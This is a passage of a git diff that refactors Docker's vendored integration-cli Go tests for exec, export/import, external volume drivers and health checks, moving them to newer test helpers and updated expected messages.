+	result := icmd.RunCommand(dockerBinary, "exec", "--privileged", "parent", "sh", "-c", `echo "Running exec --privileged" > /exec_priv && mknod /tmp/sdb b 8 16 && usleep 50000 && echo "Finished exec --privileged" > /exec_priv && echo ok`)
+	result.Assert(c, icmd.Success)
 
-	actual := strings.TrimSpace(out)
-	c.Assert(actual, checker.Equals, "ok", check.Commentf("exec mknod in --cap-drop=ALL container with --privileged failed, output: %q", out))
+	actual := strings.TrimSpace(result.Combined())
+	c.Assert(actual, checker.Equals, "ok", check.Commentf("exec mknod in --cap-drop=ALL container with --privileged failed, output: %q", result.Combined()))
 
 	// Check subsequent unprivileged exec cannot mknod
-	cmd = exec.Command(dockerBinary, "exec", "parent", "sh", "-c", "mknod /tmp/sdc b 8 32")
-	out, _, err = runCommandWithOutput(cmd)
-	c.Assert(err, checker.NotNil, check.Commentf("repeating exec mknod in --cap-drop=ALL container after --privileged without --privileged should fail"))
-	c.Assert(out, checker.Contains, "Operation not permitted", check.Commentf("repeating exec mknod in --cap-drop=ALL container after --privileged without --privileged should fail"))
-
+	icmd.RunCommand(dockerBinary, "exec", "parent", "sh", "-c", "mknod /tmp/sdc b 8 32").Assert(c, icmd.Expected{
+		ExitCode: 1,
+		Err:      "Operation not permitted",
+	})
 	// Confirm at no point was mknod allowed
-	logCmd := exec.Command(dockerBinary, "logs", "parent")
-	out, _, err = runCommandWithOutput(logCmd)
-	c.Assert(err, checker.IsNil)
-	c.Assert(out, checker.Not(checker.Contains), "Success")
+	result = icmd.RunCommand(dockerBinary, "logs", "parent")
+	result.Assert(c, icmd.Success)
+	c.Assert(result.Combined(), checker.Not(checker.Contains), "Success")
 
 }
 
@@ -474,13 +479,9 @@ func (s *DockerSuite) TestExecWithImageUser(c *check.C) {
 	// Not applicable on Windows
 	testRequires(c, DaemonIsLinux)
 	name := "testbuilduser"
-	_, err := buildImage(name,
-		`FROM busybox
+	buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox
 		RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd
-		USER dockerio`,
-		true)
-	c.Assert(err, checker.IsNil)
-
+		USER dockerio`))
 	dockerCmd(c, "run", "-d", "--name", "dockerioexec", name, "top")
 
 	out, _ := dockerCmd(c, "exec", "dockerioexec", "whoami")
@@ -498,12 +499,12 @@ func (s *DockerSuite) TestExecOnReadonlyContainer(c *check.C) {
 func (s *DockerSuite) TestExecUlimits(c *check.C) {
 	testRequires(c, DaemonIsLinux)
 	name := "testexeculimits"
-	runSleepingContainer(c, "-d", "--ulimit", "nproc=21", "--name", name)
+	runSleepingContainer(c, "-d", "--ulimit", "nofile=511:511", "--name", name)
 	c.Assert(waitRun(name), checker.IsNil)
 
-	out, _, err := dockerCmdWithError("exec", name, "sh", "-c", "ulimit -p")
+	out, _, err := dockerCmdWithError("exec", name, "sh", "-c", "ulimit -n")
 	c.Assert(err, checker.IsNil)
-	c.Assert(strings.TrimSpace(out), checker.Equals, "21")
+	c.Assert(strings.TrimSpace(out), checker.Equals, "511")
 }
 
 // #15750
@@ -549,6 +550,7 @@ func (s *DockerSuite) TestExecWindowsOpenHandles(c *check.C) {
 		exec <- true
 	}()
 
+	count := 0
 	for {
 		top := make(chan string)
 		var out string
@@ -559,7 +561,7 @@ func (s *DockerSuite) TestExecWindowsOpenHandles(c *check.C) {
 
 		select {
 		case <-time.After(time.Second * 5):
-			c.Error("timed out waiting for top while exec is exiting")
+			c.Fatal("timed out waiting for top while exec is exiting")
 		case out = <-top:
 			break
 		}
@@ -568,6 +570,10 @@ func (s *DockerSuite) TestExecWindowsOpenHandles(c *check.C) {
 			// The initial exec process (cmd.exe) has exited, and both sleeps are currently running
 			break
 		}
+		count++
+		if count >= 30 {
+			c.Fatal("too many retries")
+		}
 		time.Sleep(1 * time.Second)
 	}
 
@@ -579,7 +585,7 @@ func (s *DockerSuite) TestExecWindowsOpenHandles(c *check.C) {
 
 	select {
 	case <-time.After(time.Second * 5):
-		c.Error("timed out waiting for inspect while exec is exiting")
+		c.Fatal("timed out waiting for inspect while exec is exiting")
 	case <-inspect:
 		break
 	}
@@ -591,7 +597,7 @@ func (s *DockerSuite) TestExecWindowsOpenHandles(c *check.C) {
 	// The exec should exit when the background sleep exits
 	select {
 	case <-time.After(time.Second * 15):
-		c.Error("timed out waiting for async exec to exit")
+		c.Fatal("timed out waiting for async exec to exit")
 	case <-exec:
 		// Ensure the background sleep has actually exited
 		out, _ := dockerCmd(c, "top", "test")
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_exec_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_exec_unix_test.go
index 5f691196f1..4c77df4f11 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_exec_unix_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_exec_unix_test.go
@@ -9,7 +9,7 @@ import (
 	"strings"
 	"time"
 
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/integration-cli/checker"
 	"github.com/go-check/check"
 	"github.com/kr/pty"
 )
@@ -25,7 +25,6 @@ func (s *DockerSuite) TestExecInteractiveStdinClose(c *check.C) {
 	c.Assert(err, checker.IsNil)
 
 	b := bytes.NewBuffer(nil)
-	go io.Copy(b, p)
 
 	ch := make(chan error)
 	go func() { ch <- cmd.Wait() }()
@@ -33,9 +32,14 @@ func (s *DockerSuite) TestExecInteractiveStdinClose(c *check.C) {
 	select {
 	case err := <-ch:
 		c.Assert(err, checker.IsNil)
-		output := b.String()
+		io.Copy(b, p)
+		p.Close()
+		bs := b.Bytes()
+		bs = bytes.Trim(bs, "\x00")
+		output := string(bs[:])
 		c.Assert(strings.TrimSpace(output), checker.Equals, "hello")
 	case <-time.After(5 * time.Second):
+		p.Close()
 		c.Fatal("timed out running docker exec")
 	}
 }
@@ -69,7 +73,7 @@ func (s *DockerSuite) TestExecTTY(c *check.C) {
 	c.Assert(bytes.Contains(buf, []byte("hello")), checker.Equals, true, check.Commentf(string(buf[:read])))
 }
 
-// Test the the TERM env var is set when -t is provided on exec
+// Test the TERM env var is set when -t is provided on exec
 func (s *DockerSuite) TestExecWithTERM(c *check.C) {
 	testRequires(c, DaemonIsLinux, SameHostDaemon)
 	out, _ := dockerCmd(c, "run", "-id", "busybox", "/bin/cat")
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_experimental_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_experimental_test.go
deleted file mode 100644
index 6a49cc8cb1..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_experimental_test.go
+++ /dev/null
@@ -1,36 +0,0 @@
-package main
-
-import (
-	"strings"
-
-	"github.com/docker/docker/pkg/integration/checker"
-	"github.com/go-check/check"
-)
-
-func (s *DockerSuite) TestExperimentalVersionTrue(c *check.C) {
-	testRequires(c, ExperimentalDaemon)
-
-	out, _ := dockerCmd(c, "version")
-	for _, line := range strings.Split(out, "\n") {
-		if strings.HasPrefix(strings.TrimSpace(line), "Experimental:") {
-			c.Assert(line, checker.Matches, "*true")
-			return
-		}
-	}
-
-	c.Fatal(`"Experimental" not found in version output`)
-}
-
-func (s *DockerSuite) TestExperimentalVersionFalse(c *check.C) {
-	testRequires(c, NotExperimentalDaemon)
-
-	out, _ := dockerCmd(c, "version")
-	for _, line := range strings.Split(out, "\n") {
-		if strings.HasPrefix(strings.TrimSpace(line), "Experimental:") {
-			c.Assert(line, checker.Matches, "*false")
-			return
-		}
-	}
-
-	c.Fatal(`"Experimental" not found in version output`)
-}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_export_import_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_export_import_test.go
index 069dc08162..d0dac97367 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_export_import_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_export_import_test.go
@@ -2,31 +2,15 @@ package main
 
 import (
 	"os"
-	"os/exec"
 	"strings"
 
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/integration-cli/checker"
 	"github.com/go-check/check"
+	"gotest.tools/icmd"
 )
 
-// export an image and try to import it into a new one
-func (s *DockerSuite) TestExportContainerAndImportImage(c *check.C) {
-	testRequires(c, DaemonIsLinux)
-	containerID := "testexportcontainerandimportimage"
-
-	dockerCmd(c, "run", "--name", containerID, "busybox", "true")
-
-	out, _ := dockerCmd(c, "export", containerID)
-
-	importCmd := exec.Command(dockerBinary, "import", "-", "repo/testexp:v1")
-	importCmd.Stdin = strings.NewReader(out)
-	out, _, err := runCommandWithOutput(importCmd)
-	c.Assert(err, checker.IsNil, check.Commentf("failed to import image repo/testexp:v1: %s", out))
-
-	cleanedImageID := strings.TrimSpace(out)
-	c.Assert(cleanedImageID, checker.Not(checker.Equals), "", check.Commentf("output should have been an image id"))
-}
-
+// TODO: Move this test to docker/cli, as it is essentially the same test
+// as TestExportContainerAndImportImage except output to a file.
 // Used to test output flag in the export command
 func (s *DockerSuite) TestExportContainerWithOutputAndImportImage(c *check.C) {
 	testRequires(c, DaemonIsLinux)
@@ -36,14 +20,15 @@ func (s *DockerSuite) TestExportContainerWithOutputAndImportImage(c *check.C) {
 	dockerCmd(c, "export", "--output=testexp.tar", containerID)
 	defer os.Remove("testexp.tar")
 
-	out, _, err := runCommandWithOutput(exec.Command("cat", "testexp.tar"))
-	c.Assert(err, checker.IsNil, check.Commentf(out))
+	resultCat := icmd.RunCommand("cat", "testexp.tar")
+	resultCat.Assert(c, icmd.Success)
 
-	importCmd := exec.Command(dockerBinary, "import", "-", "repo/testexp:v1")
-	importCmd.Stdin = strings.NewReader(out)
-	out, _, err = runCommandWithOutput(importCmd)
-	c.Assert(err, checker.IsNil, check.Commentf("failed to import image repo/testexp:v1: %s", out))
+	result := icmd.RunCmd(icmd.Cmd{
+		Command: []string{dockerBinary, "import", "-", "repo/testexp:v1"},
+		Stdin:   strings.NewReader(resultCat.Combined()),
+	})
+	result.Assert(c, icmd.Success)
 
-	cleanedImageID := strings.TrimSpace(out)
+	cleanedImageID := strings.TrimSpace(result.Combined())
 	c.Assert(cleanedImageID, checker.Not(checker.Equals), "", check.Commentf("output should have been an image id"))
 }
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_external_volume_driver_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_external_volume_driver_unix_test.go
index 806d87ec77..719473b13e 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_external_volume_driver_unix_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_external_volume_driver_unix_test.go
@@ -16,7 +16,9 @@ import (
 	"time"
 
 	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/integration-cli/checker"
+	"github.com/docker/docker/integration-cli/daemon"
+	testdaemon "github.com/docker/docker/internal/test/daemon"
 	"github.com/docker/docker/pkg/stringid"
 	"github.com/docker/docker/volume"
 	"github.com/go-check/check"
@@ -44,18 +46,21 @@ type eventCounter struct {
 
 type DockerExternalVolumeSuite struct {
 	ds *DockerSuite
-	d  *Daemon
+	d  *daemon.Daemon
 	*volumePlugin
 }
 
 func (s *DockerExternalVolumeSuite) SetUpTest(c *check.C) {
-	s.d = NewDaemon(c)
+	testRequires(c, SameHostDaemon)
+	s.d = daemon.New(c, dockerBinary, dockerdBinary, testdaemon.WithEnvironment(testEnv.Execution))
 	s.ec = &eventCounter{}
 }
 
 func (s *DockerExternalVolumeSuite) TearDownTest(c *check.C) {
-	s.d.Stop()
-	s.ds.TearDownTest(c)
+	if s.d != nil {
+		s.d.Stop(c)
+		s.ds.TearDownTest(c)
+	}
 }
 
 func (s *DockerExternalVolumeSuite) SetUpSuite(c *check.C) {
@@ -98,10 +103,8 @@ func newVolumePlugin(c *check.C, name string) *volumePlugin {
 	read := func(b io.ReadCloser) (pluginRequest, error) {
 		defer b.Close()
 		var pr pluginRequest
-		if err := json.NewDecoder(b).Decode(&pr); err != nil {
-			return pr, err
-		}
-		return pr, nil
+		err := json.NewDecoder(b).Decode(&pr)
+		return pr, err
 	}
 
 	send := func(w http.ResponseWriter, data interface{}) {
@@ -284,20 +287,15 @@ func (s *DockerExternalVolumeSuite) TestVolumeCLICreateOptionConflict(c *check.C
 
 	out, _, err := dockerCmdWithError("volume", "create", "test", "--driver", volumePluginName)
 	c.Assert(err, check.NotNil, check.Commentf("volume create exception name already in use with another driver"))
-	c.Assert(out, checker.Contains, "A volume named test already exists")
+	c.Assert(out, checker.Contains, "must be unique")
 
 	out, _ = dockerCmd(c, "volume", "inspect", "--format={{ .Driver }}", "test")
 	_, _, err = dockerCmdWithError("volume", "create", "test", "--driver", strings.TrimSpace(out))
 	c.Assert(err, check.IsNil)
-
-	// make sure hidden --name option conflicts with positional arg name
-	out, _, err = dockerCmdWithError("volume", "create", "--name", "test2", "test2")
-	c.Assert(err, check.NotNil, check.Commentf("Conflicting options: either specify --name or provide positional arg, not both"))
 }
 
 func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverNamed(c *check.C) {
-	err := s.d.StartWithBusybox()
-	c.Assert(err, checker.IsNil)
+	s.d.StartWithBusybox(c)
 
 	out, err := s.d.Cmd("run", "--rm", "--name", "test-data", "-v", "external-volume-test:/tmp/external-volume-test", "--volume-driver", volumePluginName, "busybox:latest", "cat", "/tmp/external-volume-test/test")
 	c.Assert(err, checker.IsNil, check.Commentf(out))
@@ -319,8 +317,7 @@ func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverNamed(c *check.C) {
 }
 
 func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverUnnamed(c *check.C) {
-	err := s.d.StartWithBusybox()
-	c.Assert(err, checker.IsNil)
+	s.d.StartWithBusybox(c)
 
 	out, err := s.d.Cmd("run", "--rm", "--name", "test-data", "-v", "/tmp/external-volume-test", "--volume-driver", volumePluginName, "busybox:latest", "cat", "/tmp/external-volume-test/test")
 	c.Assert(err, checker.IsNil, check.Commentf(out))
@@ -334,8 +331,7 @@ func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverUnnamed(c *check.C)
 }
 
 func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverVolumesFrom(c *check.C) {
-	err := s.d.StartWithBusybox()
-	c.Assert(err, checker.IsNil)
+	s.d.StartWithBusybox(c)
 
 	out, err := s.d.Cmd("run", "--name", "vol-test1", "-v", "/foo", "--volume-driver", volumePluginName, "busybox:latest")
 	c.Assert(err, checker.IsNil, check.Commentf(out))
@@ -354,8 +350,7 @@ func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverVolumesFrom(c *check
 }
 
 func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverDeleteContainer(c *check.C) {
-	err := s.d.StartWithBusybox()
-	c.Assert(err, checker.IsNil)
+	s.d.StartWithBusybox(c)
 
 	out, err := s.d.Cmd("run", "--name", "vol-test1", "-v", "/foo", "--volume-driver", volumePluginName, "busybox:latest")
 	c.Assert(err, checker.IsNil, check.Commentf(out))
@@ -412,26 +407,24 @@ func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverLookupNotBlocked(c *
 }
 
 func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverRetryNotImmediatelyExists(c *check.C) {
-	err := s.d.StartWithBusybox()
-	c.Assert(err, checker.IsNil)
-
-	specPath := "/etc/docker/plugins/test-external-volume-driver-retry.spec"
-	os.RemoveAll(specPath)
-	defer os.RemoveAll(specPath)
+	s.d.StartWithBusybox(c)
+	driverName := "test-external-volume-driver-retry"
 
 	errchan := make(chan error)
+	started := make(chan struct{})
 	go func() {
-		if out, err := s.d.Cmd("run", "--rm", "--name", "test-data-retry", "-v", "external-volume-test:/tmp/external-volume-test", "--volume-driver", "test-external-volume-driver-retry", "busybox:latest"); err != nil {
+		close(started)
+		if out, err := s.d.Cmd("run", "--rm", "--name", "test-data-retry", "-v", "external-volume-test:/tmp/external-volume-test", "--volume-driver", driverName, "busybox:latest"); err != nil {
 			errchan <- fmt.Errorf("%v:\n%s", err, out)
 		}
 		close(errchan)
 	}()
-	go func() {
-		// wait for a retry to occur, then create spec to allow plugin to register
-		time.Sleep(2000 * time.Millisecond)
-		// no need to check for an error here since it will get picked up by the timeout later
-		ioutil.WriteFile(specPath, []byte(s.Server.URL), 0644)
-	}()
+
+	<-started
+	// wait for a retry to occur, then create spec to allow plugin to register
+	time.Sleep(2 * time.Second)
+	p := newVolumePlugin(c, driverName)
+	defer p.Close()
 
 	select {
 	case err := <-errchan:
@@ -440,14 +433,14 @@ func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverRetryNotImmediatelyE
 		c.Fatal("volume creates fail when plugin not immediately available")
 	}
 
-	_, err = s.d.Cmd("volume", "rm", "external-volume-test")
+	_, err := s.d.Cmd("volume", "rm", "external-volume-test")
 	c.Assert(err, checker.IsNil)
 
-	c.Assert(s.ec.activations, checker.Equals, 1)
-	c.Assert(s.ec.creations, checker.Equals, 1)
-	c.Assert(s.ec.removals, checker.Equals, 1)
-	c.Assert(s.ec.mounts, checker.Equals, 1)
-	c.Assert(s.ec.unmounts, checker.Equals, 1)
+	c.Assert(p.ec.activations, checker.Equals, 1)
+	c.Assert(p.ec.creations, checker.Equals, 1)
+	c.Assert(p.ec.removals, checker.Equals, 1)
+	c.Assert(p.ec.mounts, checker.Equals, 1)
+	c.Assert(p.ec.unmounts, checker.Equals, 1)
 }
 
 func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverBindExternalVolume(c *check.C) {
@@ -501,12 +494,11 @@ func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverGet(c *check.C) {
 
 func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverWithDaemonRestart(c *check.C) {
 	dockerCmd(c, "volume", "create", "-d", volumePluginName, "abc1")
-	err := s.d.Restart()
-	c.Assert(err, checker.IsNil)
+	s.d.Restart(c)
 
 	dockerCmd(c, "run", "--name=test", "-v", "abc1:/foo", "busybox", "true")
 	var mounts []types.MountPoint
-	inspectFieldAndMarshall(c, "test", "Mounts", &mounts)
+	inspectFieldAndUnmarshall(c, "test", "Mounts", &mounts)
 	c.Assert(mounts, checker.HasLen, 1)
 	c.Assert(mounts[0].Driver, checker.Equals, volumePluginName)
 }
@@ -514,7 +506,7 @@ func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverWithDaemonRestart(c
 // Ensures that the daemon handles when the plugin responds to a `Get` request with a null volume and a null error.
 // Prior the daemon would panic in this scenario.
 func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverGetEmptyResponse(c *check.C) {
-	c.Assert(s.d.Start(), checker.IsNil)
+	s.d.Start(c)
 
 	out, err := s.d.Cmd("volume", "create", "-d", volumePluginName, "abc2", "--opt", "ninja=1")
 	c.Assert(err, checker.IsNil, check.Commentf(out))
@@ -525,27 +517,24 @@ func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverGetEmptyResponse(c *
 }
 
 // Ensure only cached paths are used in volume list to prevent N+1 calls to `VolumeDriver.Path`
+//
+// TODO(@cpuguy83): This test is testing internal implementation. In all the cases here, there may not even be a path
+// 	available because the volume is not even mounted. Consider removing this test.
 func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverPathCalls(c *check.C) {
-	c.Assert(s.d.Start(), checker.IsNil)
+	s.d.Start(c)
 	c.Assert(s.ec.paths, checker.Equals, 0)
 
 	out, err := s.d.Cmd("volume", "create", "test", "--driver=test-external-volume-driver")
 	c.Assert(err, checker.IsNil, check.Commentf(out))
-	c.Assert(s.ec.paths, checker.Equals, 1)
+	c.Assert(s.ec.paths, checker.Equals, 0)
 
 	out, err = s.d.Cmd("volume", "ls")
 	c.Assert(err, checker.IsNil, check.Commentf(out))
-	c.Assert(s.ec.paths, checker.Equals, 1)
-
-	out, err = s.d.Cmd("volume", "inspect", "--format='{{.Mountpoint}}'", "test")
-	c.Assert(err, checker.IsNil, check.Commentf(out))
-	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
-	c.Assert(s.ec.paths, checker.Equals, 1)
+	c.Assert(s.ec.paths, checker.Equals, 0)
 }
 
 func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverMountID(c *check.C) {
-	err := s.d.StartWithBusybox()
-	c.Assert(err, checker.IsNil)
+	s.d.StartWithBusybox(c)
 
 	out, err := s.d.Cmd("run", "--rm", "-v", "external-volume-test:/tmp/external-volume-test", "--volume-driver", volumePluginName, "busybox:latest", "cat", "/tmp/external-volume-test/test")
 	c.Assert(err, checker.IsNil, check.Commentf(out))
@@ -554,7 +543,7 @@ func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverMountID(c *check.C)
 
 // Check that VolumeDriver.Capabilities gets called, and only called once
 func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverCapabilities(c *check.C) {
-	c.Assert(s.d.Start(), checker.IsNil)
+	s.d.Start(c)
 	c.Assert(s.ec.caps, checker.Equals, 0)
 
 	for i := 0; i < 3; i++ {
@@ -572,14 +561,14 @@ func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverOutOfBandDelete(c *c
 	p := newVolumePlugin(c, driverName)
 	defer p.Close()
 
-	c.Assert(s.d.StartWithBusybox(), checker.IsNil)
+	s.d.StartWithBusybox(c)
 
 	out, err := s.d.Cmd("volume", "create", "-d", driverName, "--name", "test")
 	c.Assert(err, checker.IsNil, check.Commentf(out))
 
 	out, err = s.d.Cmd("volume", "create", "-d", "local", "--name", "test")
 	c.Assert(err, checker.NotNil, check.Commentf(out))
-	c.Assert(out, checker.Contains, "volume named test already exists")
+	c.Assert(out, checker.Contains, "must be unique")
 
 	// simulate out of band volume deletion on plugin level
 	delete(p.vols, "test")
@@ -617,7 +606,7 @@ func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverOutOfBandDelete(c *c
 }
 
 func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverUnmountOnMountFail(c *check.C) {
-	c.Assert(s.d.StartWithBusybox(), checker.IsNil)
+	s.d.StartWithBusybox(c)
 	s.d.Cmd("volume", "create", "-d", "test-external-volume-driver", "--opt=invalidOption=1", "--name=testumount")
 
 	out, _ := s.d.Cmd("run", "-v", "testumount:/foo", "busybox", "true")
@@ -625,3 +614,18 @@ func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverUnmountOnMountFail(c
 	out, _ = s.d.Cmd("run", "-w", "/foo", "-v", "testumount:/foo", "busybox", "true")
 	c.Assert(s.ec.unmounts, checker.Equals, 0, check.Commentf(out))
 }
+
+func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverUnmountOnCp(c *check.C) {
+	s.d.StartWithBusybox(c)
+	s.d.Cmd("volume", "create", "-d", "test-external-volume-driver", "--name=test")
+
+	out, _ := s.d.Cmd("run", "-d", "--name=test", "-v", "test:/foo", "busybox", "/bin/sh", "-c", "touch /test && top")
+	c.Assert(s.ec.mounts, checker.Equals, 1, check.Commentf(out))
+
+	out, _ = s.d.Cmd("cp", "test:/test", "/tmp/test")
+	c.Assert(s.ec.mounts, checker.Equals, 2, check.Commentf(out))
+	c.Assert(s.ec.unmounts, checker.Equals, 1, check.Commentf(out))
+
+	out, _ = s.d.Cmd("kill", "test")
+	c.Assert(s.ec.unmounts, checker.Equals, 2, check.Commentf(out))
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_health_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_health_test.go
index 6b7baebd00..a06b6c8830 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_health_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_health_test.go
@@ -2,32 +2,16 @@ package main
 
 import (
 	"encoding/json"
-
 	"strconv"
 	"strings"
 	"time"
 
 	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/integration-cli/checker"
+	"github.com/docker/docker/integration-cli/cli/build"
 	"github.com/go-check/check"
 )
 
-func waitForStatus(c *check.C, name string, prev string, expected string) {
-	prev = prev + "\n"
-	expected = expected + "\n"
-	for {
-		out, _ := dockerCmd(c, "inspect", "--format={{.State.Status}}", name)
-		if out == expected {
-			return
-		}
-		c.Check(out, checker.Equals, prev)
-		if out != prev {
-			return
-		}
-		time.Sleep(100 * time.Millisecond)
-	}
-}
-
 func waitForHealthStatus(c *check.C, name string, prev string, expected string) {
 	prev = prev + "\n"
 	expected = expected + "\n"
@@ -55,30 +39,26 @@ func getHealth(c *check.C, name string) *types.Health {
 func (s *DockerSuite) TestHealth(c *check.C) {
 	testRequires(c, DaemonIsLinux) // busybox doesn't work on Windows
 
+	existingContainers := ExistingContainerIDs(c)
+
 	imageName := "testhealth"
-	_, err := buildImage(imageName,
-		`FROM busybox
+	buildImageSuccessfully(c, imageName, build.WithDockerfile(`FROM busybox
 		RUN echo OK > /status
 		CMD ["/bin/sleep", "120"]
 		STOPSIGNAL SIGKILL
 		HEALTHCHECK --interval=1s --timeout=30s \
-		  CMD cat /status`,
-		true)
-
-	c.Check(err, check.IsNil)
+		  CMD cat /status`))
 
 	// No health status before starting
 	name := "test_health"
-	dockerCmd(c, "create", "--name", name, imageName)
-	out, _ := dockerCmd(c, "ps", "-a", "--format={{.Status}}")
-	c.Check(out, checker.Equals, "Created\n")
+	cid, _ := dockerCmd(c, "create", "--name", name, imageName)
+	out, _ := dockerCmd(c, "ps", "-a", "--format={{.ID}} {{.Status}}")
+	out = RemoveOutputForExistingElements(out, existingContainers)
+	c.Check(out, checker.Equals, cid[:12]+" Created\n")
 
 	// Inspect the options
 	out, _ = dockerCmd(c, "inspect",
-		"--format=timeout={{.Config.Healthcheck.Timeout}} "+
-			"interval={{.Config.Healthcheck.Interval}} "+
-			"retries={{.Config.Healthcheck.Retries}} "+
-			"test={{.Config.Healthcheck.Test}}", name)
+		"--format=timeout={{.Config.Healthcheck.Timeout}} interval={{.Config.Healthcheck.Interval}} retries={{.Config.Healthcheck.Retries}} test={{.Config.Healthcheck.Test}}", name)
 	c.Check(out, checker.Equals, "timeout=30s interval=1s retries=0 test=[CMD-SHELL cat /status]\n")
 
 	// Start
@@ -107,17 +87,15 @@ func (s *DockerSuite) TestHealth(c *check.C) {
 	dockerCmd(c, "rm", "noh")
 
 	// Disable the check with a new build
-	_, err = buildImage("no_healthcheck",
-		`FROM testhealth
-		HEALTHCHECK NONE`, true)
-	c.Check(err, check.IsNil)
+	buildImageSuccessfully(c, "no_healthcheck", build.WithDockerfile(`FROM testhealth
+		HEALTHCHECK NONE`))
 
-	out, _ = dockerCmd(c, "inspect", "--format={{.ContainerConfig.Healthcheck.Test}}", "no_healthcheck")
+	out, _ = dockerCmd(c, "inspect", "--format={{.Config.Healthcheck.Test}}", "no_healthcheck")
 	c.Check(out, checker.Equals, "[NONE]\n")
 
 	// Enable the checks from the CLI
 	_, _ = dockerCmd(c, "run", "-d", "--name=fatal_healthcheck",
-		"--health-interval=0.5s",
+		"--health-interval=1s",
 		"--health-retries=3",
 		"--health-cmd=cat /status",
 		"no_healthcheck")
@@ -143,27 +121,47 @@ func (s *DockerSuite) TestHealth(c *check.C) {
 	// Note: if the interval is too small, it seems that Docker spends all its time running health
 	// checks and never gets around to killing it.
 	_, _ = dockerCmd(c, "run", "-d", "--name=test",
-		"--health-interval=1s", "--health-cmd=sleep 5m", "--health-timeout=1ms", imageName)
+		"--health-interval=1s", "--health-cmd=sleep 5m", "--health-timeout=1s", imageName)
 	waitForHealthStatus(c, "test", "starting", "unhealthy")
 	health = getHealth(c, "test")
 	last = health.Log[len(health.Log)-1]
 	c.Check(health.Status, checker.Equals, "unhealthy")
 	c.Check(last.ExitCode, checker.Equals, -1)
-	c.Check(last.Output, checker.Equals, "Health check exceeded timeout (1ms)")
+	c.Check(last.Output, checker.Equals, "Health check exceeded timeout (1s)")
 	dockerCmd(c, "rm", "-f", "test")
 
 	// Check JSON-format
-	_, err = buildImage(imageName,
-		`FROM busybox
+	buildImageSuccessfully(c, imageName, build.WithDockerfile(`FROM busybox
 		RUN echo OK > /status
 		CMD ["/bin/sleep", "120"]
 		STOPSIGNAL SIGKILL
 		HEALTHCHECK --interval=1s --timeout=30s \
-		  CMD ["cat", "/my status"]`,
-		true)
-	c.Check(err, check.IsNil)
+		  CMD ["cat", "/my status"]`))
 	out, _ = dockerCmd(c, "inspect",
 		"--format={{.Config.Healthcheck.Test}}", imageName)
 	c.Check(out, checker.Equals, "[CMD cat /my status]\n")
 
 }
+
+// GitHub #33021
+func (s *DockerSuite) TestUnsetEnvVarHealthCheck(c *check.C) {
+	testRequires(c, DaemonIsLinux) // busybox doesn't work on Windows
+
+	imageName := "testhealth"
+	buildImageSuccessfully(c, imageName, build.WithDockerfile(`FROM busybox
+HEALTHCHECK --interval=1s --timeout=5s --retries=5 CMD /bin/sh -c "sleep 1"
+ENTRYPOINT /bin/sh -c "sleep 600"`))
+
+	name := "env_test_health"
+	// No health status before starting
+	dockerCmd(c, "run", "-d", "--name", name, "-e", "FOO", imageName)
+	defer func() {
+		dockerCmd(c, "rm", "-f", name)
+		dockerCmd(c, "rmi", imageName)
+	}()
+
+	// Start
+	dockerCmd(c, "start", name)
+	waitForHealthStatus(c, name, "starting", "healthy")
+
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_help_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_help_test.go
deleted file mode 100644
index 29b6553fc5..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_help_test.go
+++ /dev/null
@@ -1,321 +0,0 @@
-package main
-
-import (
-	"fmt"
-	"os/exec"
-	"runtime"
-	"strings"
-	"unicode"
-
-	"github.com/docker/docker/pkg/homedir"
-	"github.com/docker/docker/pkg/integration/checker"
